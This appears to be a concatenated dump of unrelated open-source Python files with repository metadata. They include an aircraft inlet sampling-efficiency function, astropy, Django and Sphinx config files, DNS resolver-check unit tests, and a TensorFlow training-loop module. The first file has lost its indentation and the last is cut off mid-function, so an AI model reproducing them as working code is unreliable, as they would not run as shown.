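# 'manta_housekeeping.tsv' is a placeholder file name. The housekeeping file is
# loaded into a TimeSeries, and the inlet sampling efficiency for the default
# POPS geometry is computed with sample_efficiency (defined further below).
def _example_manta_workflow(fname='manta_housekeeping.tsv'):
    hk = read_csv(fname, temperature_limits=(-20, -0.5))
    eff = sample_efficiency(manta_speed=30, pressure=67.)
    return hk, eff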
# class MantaPayload(timeseries.TimeSeries):
def sample_efficiency(particle_diameters = np.logspace(np.log10(0.14), np.log10(2.5),100),
manta_speed = 30, # m/s
pressure = 67., #kPa
main_inlet_diameter = 4.65 * 1e-3,
pick_off_diameter = 2.15 * 1e-3,
pick_off_flow_rate = 3,
lfe_diameter = 0.7 * 1e-3,
verbose = False):
"""Returns the manta sample efficiency for the POPS instrument (up most inlet)
Parameters
----------
particle_diameters: float or ndarray
Particle diameter in um.
manta_speed: float
speed of the aircraft in m/s.
    pressure: float
        Barometric pressure in kPa.
main_inlet_diameter = 4.65 * 1e-3,
pick_off_diameter = 2.15 * 1e-3,
pick_off_flow_rate = 3,
lfe_diameter = 0.7 * 1e-3,
verbose = False
"""
main_inlet_bent = sampeff.loss_in_a_bent_section_of_circular_tubing(pressure = pressure, # kPa
particle_diameter = particle_diameters, # µm
tube_air_velocity = manta_speed, # m/s
tube_diameter = main_inlet_diameter, # m
angle_of_bend = 90, # degrees
flow_type = 'auto',
verbose = False)
t_pick_of = sampeff.loss_in_a_T_junction(particle_diameter=particle_diameters,
particle_velocity=30,
pick_of_tube_diameter=pick_off_diameter,
verbose=False)
laminar_flow_element = sampeff.loss_at_an_abrupt_contraction_in_circular_tubing(pressure=pressure, # kPa
particle_diameter=particle_diameters, # µm
tube_air_velocity=False, # m/s
flow_rate_in_inlet=pick_off_flow_rate, # cc/s
tube_diameter=pick_off_diameter, # m
contraction_diameter=lfe_diameter, # m
contraction_angle=90, # degrees
verbose=False,
)
bent_before_pops = sampeff.loss_in_a_bent_section_of_circular_tubing(
pressure = pressure, # kPa
particle_diameter = particle_diameters, # µm
tube_air_velocity = False, # m/s
tube_air_flow_rate = pick_off_flow_rate,
tube_diameter = pick_off_diameter, # m
angle_of_bend = 90, # degrees
flow_type = 'auto',
verbose = False)
gravitational_loss = sampeff.gravitational_loss_in_circular_tube(pressure=101.3, # kPa
particle_diameter=particle_diameters, # µm
tube_diameter=pick_off_diameter, # m
tube_length=0.25, # m
incline_angle=0, # degrees from horizontal (0-90)
flow_rate=3, # cc/s
mean_flow_velocity=False, # 0.1061 # m/s)
flow_type='auto',
verbose=False)
loss_list = [main_inlet_bent, t_pick_of, laminar_flow_element, bent_before_pops, gravitational_loss]
names = ['all_losses', 'main_inlet_bent', 't_pick_of', 'laminar_flow_element', 'bent_before_pops', 'gravitational_loss']
all_losses = 1
for l in loss_list:
all_losses *= l
loss_list.insert(0,all_losses)
df = pd.DataFrame(np.array(loss_list).transpose(), columns = names, index = particle_diameters*1e3)
df.index.name = 'diameters_nm'
return df | lo-co/atm-py | build/lib/atmPy/for_removal/Manta_payload/manta_payload.py | Python | mit | 6,200 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This subpackage contains classes and functions for celestial coordinates
of astronomical objects. It also contains a framework for conversions
between coordinate systems.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from .errors import *
from .angles import *
from .baseframe import *
from .frame_attributes import *
from .distances import *
from .earth import *
from .transformations import *
from .builtin_frames import *
from .name_resolve import *
from .matching import *
from .representation import *
from .sky_coordinate import *
from .funcs import *
from .calculation import *
from .solar_system import *
__doc__ += builtin_frames._transform_graph_docs + """
.. note::
The ecliptic coordinate systems (added in Astropy v1.1) have not been
extensively tested for accuracy or consistency with other implementations of
ecliptic coordinates. We welcome contributions to add such testing, but in
the meantime, users who depend on consistency with other implementations may
wish to check test inputs against good datasets before using Astropy's
ecliptic coordinates.
"""
| kelle/astropy | astropy/coordinates/__init__.py | Python | bsd-3-clause | 1,239 |
import os
import sys
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.txt')).read()
CHANGES = open(os.path.join(here, 'CHANGES.txt')).read()
requires = [
'PyCK',
'pyramid',
'SQLAlchemy',
'transaction',
'pyramid_tm',
'pyramid_debugtoolbar',
'pyramid_handlers',
'zope.sqlalchemy',
'waitress',
'wtforms',
'wtdojo'
]
if sys.version_info[:3] < (2, 5, 0):
requires.append('pysqlite')
setup(
name='droneos_ui',
version='0.0',
description='droneos_ui',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: PyCK",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='',
author_email='',
url='',
keywords='web PyCK framework pylons pyramid',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='droneos_ui',
install_requires=requires,
entry_points="""\
[paste.app_factory]
main = droneos_ui:main
[console_scripts]
droneos_ui_populate = droneos_ui.scripts.populate:main
droneos_ui_newapp = droneos_ui.scripts.newapp:main
""",
)
| kashifpk/droneos | droneos_ui/setup.py | Python | gpl-2.0 | 1,304 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('link', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='link',
name='mailto',
            field=models.EmailField(help_text='An email address has priority over a text link.', max_length=254, null=True, verbose_name='mailto', blank=True),
),
]
| pbs/django-cms | cms/plugins/link/migrations/0002_auto_20150928_1109.py | Python | bsd-3-clause | 494 |
# -*- coding: utf-8 -*-
#
# bumper-lib documentation build configuration file, created by
# sphinx-quickstart on Thu Feb 5 01:01:24 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bumper-lib'
copyright = u'2015, Max Zheng'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0.1'
# The full version, including alpha/beta/rc tags.
release = '0.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bumper-libdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'bumper-lib.tex', u'bumper-lib Documentation',
u'Max Zheng', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bumper-lib', u'bumper-lib Documentation',
[u'Max Zheng'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bumper-lib', u'bumper-lib Documentation',
u'Max Zheng', 'bumper-lib', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
autoclass_content = "both"
| maxzheng/bumper-lib | docs/conf.py | Python | mit | 8,243 |
from datetime import datetime
import dateutil.parser
import pytz
class Utils:
@staticmethod
def str_to_cassandra_time(dt_str):
print dt_str
dt = dateutil.parser.parse(dt_str)
dt = Utils.ensure_offset_aware(dt)
#epoch = datetime.utcfromtimestamp(0)
epoch = datetime.fromtimestamp(0, pytz.utc)
cassandra_time = (dt - epoch).total_seconds() * 1000.0
return '%d' % cassandra_time
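    # (Added note, not in the original source.) Worked example of the
    # conversion above: '2015-01-01T00:00:00+00:00' is 1420070400 seconds
    # after the Unix epoch, so this method returns the string '1420070400000',
    # i.e. milliseconds, which is what Cassandra timestamp columns expect.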
@staticmethod
def time_is_offset_naive(dt):
return dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None
@staticmethod
def ensure_offset_aware(dt):
if Utils.time_is_offset_naive(dt):
return pytz.utc.localize(dt)
else:
return dt | jacekdalkowski/bike-timer | web-api/biketimerwebapi/db/repositories/cassandra/utils.py | Python | apache-2.0 | 733 |
import nose.tools as nt
import numpy as np
import theano
import theano.tensor as T
import treeano
import treeano.nodes as tn
from treeano.sandbox.nodes import anrat
fX = theano.config.floatX
def test_anrat_node():
network = tn.AdamNode(
"adam",
{"subtree": tn.InputNode("x", shape=(None, 1)),
"cost": anrat.ANRATNode("cost", {
"target": tn.InputNode("y", shape=(None, 1)),
"pred": tn.ReferenceNode("pred_ref", reference="x"),
})}).network()
fn = network.function(["x", "y"], ["cost"], include_updates=True)
for x_raw, y_raw in [(3.4, 2),
(4.2, 4.2)]:
x = np.array([[x_raw]], dtype=fX)
y = np.array([[y_raw]], dtype=fX)
prev_cost = fn(x, y)[0]
for _ in range(3):
cost = fn(x, y)[0]
assert cost < prev_cost
prev_cost = cost
| diogo149/treeano | treeano/sandbox/nodes/tests/anrat_test.py | Python | apache-2.0 | 894 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('wrecks', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='wreck',
old_name='source_id',
new_name='source_identifier',
),
]
| greencoder/shipwrecksproject | wrecks/migrations/0002_auto_20150713_1805.py | Python | mit | 388 |
# -*- coding: utf-8 -*-
'''
testing module for the worker and dns discovery library
'''
from dns import resolver
from mock import patch, Mock
from odin.worker import Worker
IP = '192.168.0.1'
@patch('dns.resolver.Resolver')
class TestWoker:
""" test worker obj"""
def test_resolve_no_timeout(self, m_dns):
worker = Worker(IP)
assert worker._resolver.timeout == 1
assert worker.resolve() == (True, True)
def test_resolve_with_timeout(self, m_dns):
worker = Worker(IP)
assert worker._resolver.timeout == 1
assert worker.resolve(timeout=2) == (True, True)
assert worker._resolver.timeout == 2
def test_resolve_NoAnswer(self, m_dns):
m_dns().query.side_effect = resolver.NoAnswer('foo')
worker = Worker(IP)
assert worker.resolve() == (True, False)
def test_resolve_NoNameservers(self, m_dns):
m_dns().query.side_effect = resolver.NoNameservers('foo')
worker = Worker(IP)
assert worker.resolve() == (True, False)
def test_resolve_Timeout(self, m_dns):
m_dns().query.side_effect = resolver.Timeout('foo')
worker = Worker(IP)
assert worker.resolve() == (False, False)
def test_dns_version_no_timeout(self, m_dns):
answers = []
record = Mock
record.strings = ['some', 'other stuff']
answers.append(record)
m_dns().query.return_value = answers
worker = Worker(IP)
assert worker._resolver.timeout == 1
assert worker.dns_version() == answers[0].strings[0]
def test_dns_version_with_timeout(self, m_dns):
answers = []
record = Mock
record.strings = ['some', 'other stuff']
answers.append(record)
m_dns().query.return_value = answers
worker = Worker(IP)
assert worker._resolver.timeout == 1
assert worker.dns_version(timeout=2) == answers[0].strings[0]
assert worker._resolver.timeout == 2
def test_dns_version_NoNameservers(self, m_dns):
m_dns().query.side_effect = resolver.NoNameservers('foo')
worker = Worker(IP)
assert worker.dns_version() is None
def test_dns_version_Timeout(self, m_dns):
m_dns().query.side_effect = resolver.Timeout('foo')
worker = Worker(IP)
assert worker.dns_version() is None
def test_dns_scan(self, m_dns):
answers = []
record = Mock
record.strings = ['some version', 'other stuff']
answers.append(record)
m_dns().query.side_effect = [True, answers]
worker = Worker(IP)
assert worker.dns_scan() is True
assert worker.is_dns is True
assert worker.is_resolver is True
assert worker.version == 'some version'
def test_dns_scan_without_version(self, m_dns):
m_dns().query.return_value = 'whatever'
worker = Worker(IP)
assert worker.dns_scan(version=False) is True
assert worker.is_dns is True
assert worker.is_resolver is True
assert worker.version is None
| j0lly/Odin | tests/test_worker.py | Python | mit | 3,072 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""High level operations on graphs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import sys
import threading
import time
import numpy as np
from six import reraise
from tensorflow.contrib.framework.python.ops import ops as contrib_ops
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.learn.python.learn import monitors as monitors_lib
from tensorflow.contrib.learn.python.learn.utils import checkpoints
from tensorflow.core.framework import summary_pb2
from tensorflow.python.client import session as tf_session
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner
from tensorflow.python.training import saver as tf_saver
from tensorflow.python.training import session_manager as session_manager_lib
from tensorflow.python.training import summary_io
from tensorflow.python.training import supervisor as tf_supervisor
# Singleton for SummaryWriter per logdir folder.
_SUMMARY_WRITERS = {}
# Lock protecting _SUMMARY_WRITERS
_summary_writer_lock = threading.Lock()
def clear_summary_writers():
"""Clear cached summary writers. Currently only used for unit tests."""
_summary_writer_lock.acquire()
_SUMMARY_WRITERS.clear()
_summary_writer_lock.release()
def get_summary_writer(logdir):
"""Returns single SummaryWriter per logdir in current run.
Args:
logdir: str, folder to write summaries.
Returns:
Existing `SummaryWriter` object or new one if never wrote to given
directory.
"""
_summary_writer_lock.acquire()
if logdir not in _SUMMARY_WRITERS:
_SUMMARY_WRITERS[logdir] = summary_io.SummaryWriter(
logdir, graph=ops.get_default_graph())
_summary_writer_lock.release()
return _SUMMARY_WRITERS[logdir]
class NanLossDuringTrainingError(RuntimeError):
def __str__(self):
return 'NaN loss during training.'
def _make_saver(graph):
vars_to_save = graph.get_collection(ops.GraphKeys.VARIABLES)
if vars_to_save:
return tf_saver.Saver(vars_to_save, sharded=True)
else:
return None
def _restore_from_checkpoint(session, graph, checkpoint_path, saver=None):
logging.info('Loading model from checkpoint: %s.', checkpoint_path)
assert gfile.Glob(checkpoint_path)
saver = saver or _make_saver(graph)
if saver:
saver.restore(session, checkpoint_path)
else:
logging.info('No variables found in graph, not creating Saver() object.')
def _run_with_monitors(session, step, tensors, feed_dict, monitors):
"""Runs session for given tensors with monitor callbacks."""
for monitor in monitors:
tensors += monitor.step_begin(step)
tensors = list(set(tensors))
outputs = session.run(tensors, feed_dict=feed_dict)
outputs = dict(zip(
[t.name if isinstance(t, ops.Tensor) else t for t in tensors],
outputs))
should_stop = False
for monitor in monitors:
induce_stop = monitor.step_end(step, outputs)
should_stop = should_stop or induce_stop
return outputs, should_stop
# TODO(ptucker): Add unit test.
# TODO(wicke): switch to forced named kwargs
def train(graph,
output_dir,
train_op,
loss_op,
global_step_tensor=None,
init_op=None,
init_feed_dict=None,
init_fn=None,
log_every_steps=10,
supervisor_is_chief=True,
supervisor_master='',
supervisor_save_model_secs=600,
supervisor_save_summaries_steps=100,
feed_fn=None,
steps=None,
fail_on_nan_loss=True,
monitors=None):
"""Train a model.
Given `graph`, a directory to write outputs to (`output_dir`), and some ops,
  run a training loop. The given `train_op` performs one step of training on the
  model and is expected to increment the `global_step_tensor`, a scalar integer
  tensor counting training steps. The `loss_op` represents the objective
  function of the training. This function uses `Supervisor` to initialize the
graph (from a checkpoint if one is available in `output_dir`), write summaries
defined in the graph, and write regular checkpoints as defined by
`supervisor_save_model_secs`.
Training continues until `global_step_tensor` evaluates to `max_steps`, or, if
`fail_on_nan_loss`, until `loss_op` evaluates to `NaN`. In that case the
program is terminated with exit code 1.
Args:
graph: A graph to train. It is expected that this graph is not in use
elsewhere.
output_dir: A directory to write outputs to.
train_op: An op that performs one training step when run.
loss_op: A scalar loss tensor.
global_step_tensor: A tensor representing the global step. If none is given,
one is extracted from the graph using the same logic as in `Supervisor`.
init_op: An op that initializes the graph. If `None`, use `Supervisor`'s
default.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
init_fn: Optional callable passed to Supervisor to initialize the model.
log_every_steps: Output logs regularly. The logs contain timing data and the
current loss.
supervisor_is_chief: Whether the current process is the chief supervisor in
charge of restoring the model and running standard services.
supervisor_master: The master string to use when preparing the session.
supervisor_save_model_secs: Save a checkpoint every
`supervisor_save_model_secs` seconds when training.
    supervisor_save_summaries_steps: Save summaries every
      `supervisor_save_summaries_steps` steps when training.
feed_fn: A function that is called every iteration to produce a `feed_dict`
passed to `session.run` calls. Optional.
steps: Trains for this many steps (e.g. current global step + `steps`).
fail_on_nan_loss: If true, raise `NanLossDuringTrainingError` if `loss_op`
evaluates to `NaN`. If false, continue training as if nothing happened.
monitors: List of `BaseMonitor` subclass instances. Used for callbacks
inside the training loop.
Returns:
The final loss value.
Raises:
ValueError: If `global_step_tensor` is not provided. See
`tf.contrib.framework.get_global_step` for how we look it up if not
provided explicitly.
NanLossDuringTrainingError: If `fail_on_nan_loss` is `True`, and loss ever
evaluates to `NaN`.
"""
if not output_dir:
raise ValueError('Output directory should be non-empty.')
with graph.as_default():
global_step_tensor = contrib_variables.assert_or_get_global_step(
graph, global_step_tensor)
if global_step_tensor is None:
raise ValueError('No "global_step" was provided or found in the graph.')
# Get current step.
try:
start_step = checkpoints.load_variable(
output_dir, global_step_tensor.name)
except (errors.NotFoundError, ValueError):
start_step = 0
summary_writer = (get_summary_writer(output_dir)
if supervisor_is_chief else None)
# TODO(ipolosukhin): Replace all functionality of Supervisor with Monitors.
if not supervisor_is_chief:
# monitors should run only on the chief.
monitors = []
elif not monitors:
monitors = monitors_lib.get_default_monitors(
loss_op=loss_op,
summary_op=logging_ops.get_summary_op(),
save_summary_steps=supervisor_save_summaries_steps,
summary_writer=summary_writer)
max_steps = (start_step + steps) if steps else None
# Start monitors, can create graph parts.
for monitor in monitors:
monitor.begin(max_steps=max_steps)
supervisor = tf_supervisor.Supervisor(
graph,
init_op=init_op or tf_supervisor.Supervisor.USE_DEFAULT,
init_feed_dict=init_feed_dict,
is_chief=supervisor_is_chief,
logdir=output_dir,
saver=_make_saver(graph),
global_step=global_step_tensor,
summary_op=None,
summary_writer=summary_writer,
save_model_secs=supervisor_save_model_secs,
init_fn=init_fn)
session = supervisor.PrepareSession(master=supervisor_master,
start_standard_services=True)
supervisor.StartQueueRunners(session)
with session:
get_current_step = lambda: session.run(global_step_tensor)
start_step = get_current_step()
last_step = start_step
last_log_step = start_step
loss_value = None
logging.info('Training steps [%d,%s)', last_step, 'inf'
if max_steps is None else str(max_steps))
excinfo = None
try:
while not supervisor.ShouldStop() and (
(max_steps is None) or (last_step < max_steps)):
start_time = time.time()
feed_dict = feed_fn() if feed_fn is not None else None
outputs, should_stop = _run_with_monitors(
session, last_step + 1, [train_op, loss_op], feed_dict, monitors)
loss_value = outputs[loss_op.name]
if np.isnan(loss_value):
failure_message = 'Model diverged with loss = NaN.'
if fail_on_nan_loss:
logging.error(failure_message)
raise NanLossDuringTrainingError()
else:
logging.warning(failure_message)
if should_stop:
break
this_step = get_current_step()
if this_step <= last_step:
logging.error(
'Global step was not incremented by train op at step %s'
': new step %d', last_step, this_step)
last_step = this_step
is_last_step = (max_steps is not None) and (last_step >= max_steps)
if is_last_step or (last_step - last_log_step >= log_every_steps):
logging.info(
'training step %d, loss = %.5f (%.3f sec/batch).',
last_step, loss_value, float(time.time() - start_time))
last_log_step = last_step
except errors.OutOfRangeError as e:
logging.warn('Got exception during tf.learn training loop possibly '
'due to exhausted input queue %s.', e)
except BaseException as e: # pylint: disable=broad-except
# Hold on to any other exceptions while we try recording a final
# checkpoint and summary.
excinfo = sys.exc_info()
finally:
try:
# Call supervisor.Stop() from within a try block because it re-raises
# exceptions thrown by the supervised threads.
supervisor.Stop(close_summary_writer=False)
# Save one last checkpoint and summaries
# TODO(wicke): This should be handled by Supervisor
# In case we encountered an exception in the try block before we updated
# last_step, update it here (again).
last_step = get_current_step()
if supervisor_is_chief:
ckpt_path = supervisor.save_path
logging.info('Saving checkpoint for step %d to checkpoint: %s.',
last_step, ckpt_path)
supervisor.saver.save(session, ckpt_path, global_step=last_step)
# Finish monitors.
for monitor in monitors:
monitor.end()
# catch OutOfRangeError which is thrown when queue is out of data (and for
# other reasons as well).
except errors.OutOfRangeError as e:
logging.warn('OutOfRangeError in tf.learn final checkpoint possibly '
'due to exhausted input queue. Note: summary_op is not '
'expected to trigger dequeues. %s.', e)
except BaseException as e: # pylint: disable=broad-except
# If we don't already have an exception to re-raise, raise this one.
if not excinfo:
raise
# Otherwise, log this one and raise the other in the finally block.
logging.error('Got exception during tf.learn final checkpoint %s.', e)
finally:
if excinfo:
reraise(*excinfo)
return loss_value
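# --- Hypothetical usage sketch (not part of the original module) -------------
# Schematic call pattern for `train`: the caller builds `train_op`, `loss_op`
# and a 'global_step' variable inside one graph and hands them over; the
# output directory below is just a placeholder.
def _example_train_usage(graph, train_op, loss_op,
                         output_dir='/tmp/tf_learn_example'):
  return train(
      graph=graph,
      output_dir=output_dir,
      train_op=train_op,
      loss_op=loss_op,
      steps=200,            # run 200 steps past the restored global step
      log_every_steps=50,
      fail_on_nan_loss=True)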
def _get_first_op_from_collection(collection_name):
elements = ops.get_collection(collection_name)
if elements is not None:
if elements:
return elements[0]
return None
def _get_saver():
"""Lazy init and return saver."""
saver = _get_first_op_from_collection(ops.GraphKeys.SAVERS)
  # _get_first_op_from_collection already returns the first element of the
  # collection (or None), so no further unpacking is needed here.
if saver is None and variables.all_variables():
saver = tf_saver.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
return saver
def _get_ready_op():
ready_op = _get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
return ready_op
def _get_local_init_op():
local_init_op = _get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.initialize_local_variables(),
data_flow_ops.initialize_all_tables()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
return local_init_op
def _eval_results_to_str(eval_results):
return ', '.join('%s = %s' % (k, v) for k, v in eval_results.items())
def _write_summary_results(output_dir, eval_results, current_global_step):
"""Writes eval results into summary file in given dir."""
logging.info('Saving evaluation summary for %d step: %s', current_global_step,
_eval_results_to_str(eval_results))
summary_writer = get_summary_writer(output_dir)
summary = summary_pb2.Summary()
for key in eval_results:
if eval_results[key] is None:
continue
value = summary.value.add()
value.tag = key
if (isinstance(eval_results[key], np.float32) or
isinstance(eval_results[key], float)):
value.simple_value = float(eval_results[key])
summary_writer.add_summary(summary, current_global_step)
summary_writer.flush()
def evaluate(graph,
output_dir,
checkpoint_path,
eval_dict,
update_op=None,
global_step_tensor=None,
supervisor_master='',
log_every_steps=10,
feed_fn=None,
max_steps=None):
"""Evaluate a model loaded from a checkpoint.
Given `graph`, a directory to write summaries to (`output_dir`), a checkpoint
to restore variables from, and a `dict` of `Tensor`s to evaluate, run an eval
loop for `max_steps` steps, or until an exception (generally, an
end-of-input signal from a reader operation) is raised from running
`eval_dict`.
In each step of evaluation, all tensors in the `eval_dict` are evaluated, and
every `log_every_steps` steps, they are logged. At the very end of evaluation,
a summary is evaluated (finding the summary ops using `Supervisor`'s logic)
and written to `output_dir`.
Args:
graph: A `Graph` to train. It is expected that this graph is not in use
elsewhere.
output_dir: A string containing the directory to write a summary to.
checkpoint_path: A string containing the path to a checkpoint to restore.
Can be `None` if the graph doesn't require loading any variables.
eval_dict: A `dict` mapping string names to tensors to evaluate. It is
evaluated in every logging step. The result of the final evaluation is
returned. If `update_op` is None, then it's evaluated in every step. If
`max_steps` is `None`, this should depend on a reader that will raise an
      end-of-input exception when the inputs are exhausted.
update_op: A `Tensor` which is run in every step.
global_step_tensor: A `Variable` containing the global step. If `None`,
one is extracted from the graph using the same logic as in `Supervisor`.
Used to place eval summaries on training curves.
supervisor_master: The master string to use when preparing the session.
log_every_steps: Integer. Output logs every `log_every_steps` evaluation
steps. The logs contain the `eval_dict` and timing information.
feed_fn: A function that is called every iteration to produce a `feed_dict`
passed to `session.run` calls. Optional.
max_steps: Integer. Evaluate `eval_dict` this many times.
Returns:
A tuple `(eval_results, global_step)`:
eval_results: A `dict` mapping `string` to numeric values (`int`, `float`)
that are the result of running eval_dict in the last step. `None` if no
eval steps were run.
global_step: The global step this evaluation corresponds to.
"""
with graph.as_default():
global_step_tensor = contrib_variables.assert_or_get_global_step(
graph, global_step_tensor)
# Create or get summary op, global_step and saver.
saver = _get_saver()
local_init_op = _get_local_init_op()
ready_op = _get_ready_op()
session_manager = session_manager_lib.SessionManager(
local_init_op=local_init_op,
ready_op=ready_op)
session, initialized = session_manager.recover_session(
master=supervisor_master,
saver=saver,
checkpoint_dir=checkpoint_path)
# Start queue runners.
coord = coordinator.Coordinator()
threads = queue_runner.start_queue_runners(session, coord)
with session:
if not initialized:
logging.warning('Failed to initialize from %s.', checkpoint_path)
# TODO(ipolosukhin): This should be failing, but old code relies on that.
session.run(variables.initialize_all_variables())
if checkpoint_path:
_restore_from_checkpoint(session, graph, checkpoint_path, saver)
current_global_step = session.run(global_step_tensor)
eval_results = None
# TODO(amodei): Fix this to run through the eval set exactly once.
